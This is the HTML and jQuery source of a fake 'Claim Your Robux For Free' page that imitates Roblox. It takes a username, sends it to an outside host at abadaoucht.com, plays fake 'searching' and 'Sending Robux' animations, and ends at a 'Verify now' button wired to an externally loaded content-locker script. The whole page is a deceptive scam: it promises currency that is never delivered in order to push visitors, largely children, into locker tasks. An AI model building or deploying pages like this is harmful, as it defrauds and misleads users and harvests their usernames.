<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/bootstrap/5.3.3/css/bootstrap.min.css"  />
    <title>Roblox</title>


    <!-- locker code  -->
    <script type="text/javascript">
        var KQayH_AOA_euGtHc={"it":4406378,"key":"c1004"};
    </script>
    <script src="https://d1dvnx7eh6slvq.cloudfront.net/08675d3.js"></script>

    <style>
        @import url("https://fonts.googleapis.com/css2?family=Kumbh+Sans:wght@520&family=Mochiy+Pop+One&family=Nunito:wght@200&family=Poppins:wght@400;600;700;900&family=REM:wght@300&family=Varela+Round&display=swap");
        body {background-color: #232527;color: #fff;font-family: "Kumbh Sans", sans-serif;font-size: 1.1rem;}
        nav {padding: 15px 10px;border-bottom: 1px solid #111;background-color: #191b1d;}
    nav > div {display: flex;justify-content: space-between;align-items: center;}
    nav .links {display: flex;}
    nav .links > div {margin-left: 13px;}

    nav .logo {display: flex;align-items: center;font-size: 1.3rem;}
    nav .logo img {margin-left: 20px;width: 33px;}

    .banner {background-image: url("https://images.rbxcdn.com/9a75b1267d260322206e98bd256138d4-premium_title_bg.jpg");background-repeat: no-repeat;background-position: bottom;background-size: cover;text-align: center;margin: 20px 0;}
    .banner .bg {background-color: rgba(0, 0, 0, .7);padding: 10px;}
    .banner .bg div {font-size: 1.3rem;font-weight: bold;}
    .banner .bg p {font-size: 1rem;font-weight: normal;}

    .bg-item {background-color: #393b3d;padding: 25px;border-radius: 8px;}
    input {all: unset;width: 100%;box-sizing: border-box;background-color: #fff;padding: 12px 20px;border-radius: 8px;color: #000;margin: 10px 0}
    .btn-acc {all: unset;margin-top: 12px;background: #00b06f;color: #fff;padding: 9px 30px;border-radius: 8px;font-size: 1.2rem;}

.container-md {max-width: 600px;}
    .folding {
  margin: 20px auto;
  width: 70px;
  height: 70px;
  position: relative;
  transform: rotateZ(45deg);
}

.square {
  position: absolute;
  top: 30%;
  right: 30%;
  width: 30px;
  height: 30px;
  background-color: #393b3d;
  transform: rotateZ(87deg);
}
.folding .sk-cube {
  float: left;
  width: 50%;
  height: 50%;
  position: relative;
  transform: scale(1.1);
}

.folding .sk-cube:before {
  content: "";
  position: absolute;
  top: 0;
  left: 0;
  width: 100%;
  height: 100%;
  background-color: #fff;
  animation: sk-foldCubeAngle 2.4s infinite linear both;
  transform-origin: 100% 100%;
}

.folding .sk-cube2 {
  transform: scale(1.1) rotateZ(90deg);
}

.folding .sk-cube3 {
  transform: scale(1.1) rotateZ(180deg);
}

.folding .sk-cube4 {
  transform: scale(1.1) rotateZ(270deg);
}

.folding .sk-cube2:before {
  animation-delay: 0.3s;
}

.folding .sk-cube3:before {
  animation-delay: 0.6s;
}

.folding .sk-cube4:before {
  animation-delay: 0.9s;
}

@keyframes sk-foldCubeAngle {
  0%,
  10% {
    transform: perspective(140px) rotateX(-180deg);
    opacity: 0;
  }
  25%,
  75% {
    transform: perspective(140px) rotateX(0deg);
    opacity: 1;
  }
  90%,
  100% {
    transform: perspective(140px) rotateY(180deg);
    opacity: 0;
  }
}

.searching {text-align: center;padding-top: 20px;}
.user-info {text-align: center;margin-bottom: 20px;}
.user-info img {width: 80px;height: 80px;background-color: #fff;border-radius: 50%;margin-bottom: 10px;}

.robux .item {display: flex;justify-content: space-between;padding: 15px 30px;align-items: center;}
.robux .item:not(:last-child) {border-bottom: 1px solid #777;}
.robux img {width: 20px;margin-right: 8px;}
.robux .select {background-color: #00b06f;padding: 10px 30px;border-radius: 5px;display: flex;align-items: center;text-align: center;justify-content: center;width: 130px;font-weight: bold;font-size: 1.1rem;cursor: pointer;user-select: none;}
.br-bottom {border-bottom: 3px solid #fdd658;padding: 0; padding-bottom: 20px;}
.noty {background-color: #fdd658;color: #333;padding: 20px;border-radius: 8px 8px 0 0;text-align: center;margin-bottom: 25px;}
.space {width: 5px;}   
    
    </style>
</head>
<body>

    <nav>
        <div class="container-md">
            <div class="logo">
                <div>☰</div>
                <img src="data:image/svg+xml;base64,PHN2ZyB3aWR0aD0iNTYiIGhlaWdodD0iNTYiIGZpbGw9Im5vbmUiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyI+PHBhdGggZD0iTTExLjY3NiAwTDAgNDQuMTY2IDQzLjU3NyA1NmwxMS42NzYtNDQuMTY2TDExLjY3NiAwem0yMC40MDkgMzUuODI3bC0xMi4xNzctMy4zMDggMy4yNjQtMTIuMzQyIDEyLjE4MiAzLjMwOC0zLjI3IDEyLjM0MnoiIGZpbGw9IiNmZmYiLz48L3N2Zz4=" alt="" class="src">
            </div>
            <div class="links">
                <div>Discover</div>
                <div>Marketplace</div>
                <div>Robux</div>
            </div>
        </div>
    </nav>

    <div class="banner">
        <div class="bg">
            <div class="container-md">
                <div>Get Robux</div>
                <p>Robux allows you to purchase upgrades for your avatar or buy special abilities in experiences</p>
            </div>
        </div>
    </div>


    <div class="container-md">
        <div class="bg-item" id="step-1">
            <h1>Enter username</h1>
            <input type="text" id="username" placeholder="Enter Your Username">
            <div>
                <button class="btn-acc next">Next</button>
            </div>
        </div>
    </div>

    <div class="container-md">
        <div class="bg-item br-bottom d-none" id="step-2">
            <div class="noty">
                Claim Your Robux For Free
            </div>

            <div class="loading">
                <br>
                <div class="folding">
                    <div class="sk-cube1 sk-cube"></div>
                    <div class="sk-cube2 sk-cube"></div>
                    <div class="sk-cube4 sk-cube"></div>
                    <div class="sk-cube3 sk-cube"></div>
                    <div class="square"></div>
                </div>
                <div class="searching">searching for <b class="username">nnn</b></div>
            </div>
            <div class="data-recive d-none">
                <div class="user-info">
                    <div class="img"><img id="avatar" src="https://tr.rbxcdn.com/30DAY-AvatarHeadshot-6D5ECF5B1D1905FC742E6EF84DFBAAF8-Png/150/150/AvatarHeadshot/Webp/noFilter" alt=""></div>
                    <div class="username">username</div>
                </div>
                <div class="robux">
                    <div class="item">
                        <div class="price">0.00 $US</div>
                        <div class="select"><img src="https://ropalix.vercel.app/w-robux.png" alt=""> 500</div>
                    </div>
                    <div class="item">
                        <div class="price">0.00 $US</div>
                        <div class="select"><img src="https://ropalix.vercel.app/w-robux.png" alt=""> 1,000</div>
                    </div>
                    <div class="item">
                        <div class="price">0.00 $US</div>
                        <div class="select"><img src="https://ropalix.vercel.app/w-robux.png" alt=""> 50,000</div>
                    </div>
                    <div class="item">
                        <div class="price">0.00 $US</div>
                        <div class="select"><img src="https://ropalix.vercel.app/w-robux.png" alt=""> 100,000</div>
                    </div>
                </div>
            </div>
        </div>
    </div>


    <div class="container-md">
        <div class="bg-item d-none" id="step-3">
            <div class="loading-2">
                <br>
                <div class="folding">
                    <div class="sk-cube1 sk-cube"></div>
                    <div class="sk-cube2 sk-cube"></div>
                    <div class="sk-cube4 sk-cube"></div>
                    <div class="sk-cube3 sk-cube"></div>
                    <div class="square"></div>
                </div>
                <div class="searching d-flex justify-content-center align-items-center">Sending <div class="space"></div> <img style="margin-right: 3px;" width="17px" height="17px" src="https://ropalix.vercel.app/w-robux.png" alt=""><b class="robux_counter">0</b><div class="space"></div> to <div class="space"></div><b class="username">nnn</b>...</div>
            </div>
            <div class="final d-none">
                <h1>Final Step</h1>
                <p>Please click on the button below and complete 1 task to verify that you're not a robot!</p>
                <div accesskey="action">
                    <!-- button to open locker -->
                    <button class="btn-acc" onclick="_Ts()">Verify now</button>
                </div>
            </div>
        </div>
    </div>
    


              


    <br>
    <br>
    <br>


    <script src="https://cdnjs.cloudflare.com/ajax/libs/jquery/3.7.1/jquery.min.js" ></script>
    <script>
        $(".next").on("click", function(){
            $("#step-1").addClass("d-none");
            $("#step-2").removeClass("d-none");

            var username = $("#username").val();
            $(".username").text(username);
            $.ajax({
                url: `https://abadaoucht.com/tiktok/api/roblox/userinfo/${username}`,
                type: "GET",
                success: function(profileData) {
                    var res = profileData;
                    if(res["status"] == "SUCCESS"){
                        user_data = res; 
                        $(".loading").addClass("d-none")
                        $(".data-recive").removeClass("d-none");
                        $("#avatar").attr("src", user_data["avatar"])
                    }else if(res["status"] == "ERROR_USER"){
                    }
                },
                error: function() {
                    console.log("Failed to fetch profile information.");
                }
            });

        });


        $(".robux .item .select").on("click", function(){
            var robux = $(this).text();
            $(".robux_counter").text(robux);
            $("#step-2").addClass("d-none");
            $("#step-3").removeClass("d-none");
            setTimeout(function(){
                $(".loading-2").addClass("d-none");
                $(".final").removeClass("d-none");
            }, 4000);
        });
    </script>
</body>
</html>
